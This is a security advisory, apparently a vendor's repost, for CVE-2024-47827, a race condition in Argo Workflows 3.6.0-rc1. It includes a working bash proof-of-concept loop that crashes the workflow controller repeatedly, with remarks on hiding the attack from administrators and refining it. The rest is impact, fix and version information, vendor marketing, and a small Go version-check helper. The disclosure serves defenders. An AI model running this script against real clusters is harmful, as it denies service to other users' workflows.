Summary
Due to a race condition on a global variable, the Argo Workflows controller can be made to crash on command by any user with permission to execute a workflow.
This was resolved by https://github.com/argoproj/argo-workflows/pull/13641
Details
The two lines linked below introduce a data race that affects the underlying SPDY implementation of the Kubernetes API client. If a second request is made before the first completes, the controller panics on a nil pointer dereference.
- https://github.com/argoproj/argo-workflows/blob/ce7f9bfb9b45f009b3e85fabe5e6410de23c7c5f/workflow/metrics/metrics_k8s_request.go#L49
- https://github.com/argoproj/argo-workflows/blob/ce7f9bfb9b45f009b3e85fabe5e6410de23c7c5f/workflow/metrics/metrics_k8s_request.go#L75
This appears to have been introduced by commit https://github.com/argoproj/argo-workflows/commit/9756babd0ed589d1cd24592f05725f748f74130b (#13265), which shipped in v3.6.0-rc1.
PoC
With the KUBECONFIG environment variable pointing to a kubeconfig file whose credentials have create permission for the Workflow kind, execute the following bash script:
#!/bin/bash -xeu

while true ; do
  name=$(
    { argo submit /dev/stdin <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: curl-
spec:
  entrypoint: main
  templates:
    - name: main
      dag:
        tasks:
          - name: no-op
            template: no-op
            withSequence:
              count: 3
    - name: no-op
      daemon: true
      container:
        image: alpine:3.13
        command: [sleep, infinity]
EOF
    } | head -n1 | awk '{ print $2 }'
  )

  ( sleep 30; argo terminate $name ) &
  sleep 15
done
This script creates, and subsequently cleans up, multiple daemon pods in rapid succession. Each pod cleanup involves executing a kill instruction through the Kubernetes exec API, which triggers the conditions for the panic. The visible symptom is that the pods are marked as complete but the workflow itself never completes. The controller logs at that point show the controller panicking and restarting every few seconds. Where restarts are subject to exponential backoff (e.g. in a Kubernetes Pod), the crashes are frequent and reliable enough to extend the backoff significantly and leave other workflows stalled.
Because the restarted controller believes it has already sent the kill signal, it waits indefinitely for the pod to terminate, which never happens. The attack must therefore constantly garbage-collect its own workflows with the argo terminate command; otherwise the maximum number of concurrently running workflows will be reached. A more sophisticated attack could detect when the workflow has been signaled to clean up and terminate it at that moment instead of relying on a simple timer.
Impact
A malicious user with access to create workflows can continually submit workflows that do nothing except create and then clean up multiple daemon pods, resulting in a crash loop that prevents other users' workflows from running. This can be done with only a handful of pods and very little CPU and memory, meaning typical multi-tenant Kubernetes controls such as Pod count and resource quotas are not effective at preventing it.
The panic log does not in any way suggest that the issue has anything to do with the daemon pods, and an attacker could easily disguise these daemon pods as part of a genuine workflow. It would therefore be difficult for administrators to discover the root cause of the DoS, or to identify the individuals responsible in order to remove their access.
Multiple concurrent operations access a shared resource without proper synchronization, producing unpredictable results depending on timing. Typical impact: TOCTOU exploits, data corruption, or privilege escalation.
CVE-2024-47827 has a CVSS score of 5.7 (Medium). The attack is reachable from an adjacent network, requires low privileges, and needs no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (3.6.0-rc2); upgrading removes the vulnerable code path.
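Affected versions
github.com/argoproj/argo-workflows/v3 (Go): 3.6.0-rc1
Security releases
github.com/argoproj/argo-workflows/v3 (Go): 3.6.0-rc2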
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2024-47827? CVE-2024-47827 is a medium-severity race condition vulnerability in github.com/argoproj/argo-workflows/v3 (Go), affecting version 3.6.0-rc1. It is fixed in 3.6.0-rc2. Multiple concurrent operations access a shared resource without proper synchronization, producing unpredictable results depending on timing.
- How severe is CVE-2024-47827? CVE-2024-47827 has a CVSS score of 5.7 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/argoproj/argo-workflows/v3 are affected by CVE-2024-47827? Version 3.6.0-rc1 of github.com/argoproj/argo-workflows/v3 (Go) is affected.
- Is there a fix for CVE-2024-47827? Yes. CVE-2024-47827 is fixed in 3.6.0-rc2. Upgrade to this version or later.
- Is CVE-2024-47827 exploitable, and should I be worried? Whether CVE-2024-47827 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
- What actually determines whether CVE-2024-47827 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2024-47827? Upgrade github.com/argoproj/argo-workflows/v3 to 3.6.0-rc2 or later.
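The version information in this advisory can be turned into a quick check. The following is a minimal sketch, assuming you already have the module version string in hand (for example, copied from a go.mod file); `isAffected` is a hypothetical helper, and the sample inputs in `main` are illustrative only.

```go
package main

import (
	"fmt"
	"strings"
)

// Version strings taken from the advisory text.
const (
	affectedVersion = "3.6.0-rc1"
	fixedVersion    = "3.6.0-rc2"
)

// isAffected reports whether a version string, with or without the
// leading "v" used in Go module versions, names the affected release.
// The advisory lists exactly one affected version, so this is an
// equality check rather than a range comparison.
func isAffected(version string) bool {
	v := strings.TrimPrefix(strings.TrimSpace(version), "v")
	return v == affectedVersion
}

func main() {
	// Illustrative inputs, not taken from a real project.
	for _, v := range []string{"v3.5.10", "v3.6.0-rc1", "3.6.0-rc2"} {
		if isAffected(v) {
			fmt.Printf("%s: affected, upgrade to %s or later\n", v, fixedVersion)
		} else {
			fmt.Printf("%s: not listed as affected\n", v)
		}
	}
}
```

A plain equality check is used because only one release is listed as affected; a wider affected range would call for a proper semantic-version comparison instead.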